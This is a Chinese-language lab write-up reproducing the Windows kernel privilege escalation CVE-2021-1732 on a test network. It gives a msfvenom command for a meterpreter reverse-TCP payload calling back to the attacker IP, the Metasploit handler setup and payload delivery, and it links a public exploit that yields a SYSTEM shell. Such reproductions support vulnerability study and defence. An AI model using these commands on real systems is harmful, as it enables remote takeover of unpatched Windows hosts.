环境说明
| IP | MachineName | NOTE |
|---|
| 172.16.106.67 | kali_dqy | 攻击者主机 |
| 172.16.100.53 | KC360_WIN10_3 | 受害者主机 |
背景及漏洞描述
- 2021年上半年“蔓灵花”APT组织将WINDOWS内核提权漏洞(CVE-2021-1732)用于攻击活动,该漏洞由于创建窗口时调用win32kfull!xxxCreateWindowEx过程中会进行用户模式回调,破坏函数正常执行流程,最终导致内核空间的内存越界读写。
- 该漏洞可以导致本地将普通进程的权限提升至SYSTEM权限。
危害等级
影响版本

复现过程
EXP准备
https://github.com/KaLendsi/CVE-2021-1732-Exploit

- 本地Visual Studio 2021编译成功,如下图:

Windows版本检测
- WIN+R打开运行,输入winver命令,即可看到当前版本,如下图,处于受影响版本:

MSF生成Payload
msfvenom -a x64 --platform windows -p windows/x64/meterpreter/reverse_tcp lhost=172.16.106.67 lport=2336 -f exe > cve_2021_1732_test.exe

MSF开启监听
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 172.16.106.67
set lport 2336
exploit

投递Payload于受害者主机
- 本地启动了Apache服务,然后将其Payload放到web目录下,Win10主机以web的方式下载Payload到本地

本地提权漏洞结合MSF Payload
- 打开powershell,我们用之前编译好的提权EXP来执行刚才的MSF Payload,如下图:

- 如下图,可以发现获取到了meterpreter会话权限为System权限
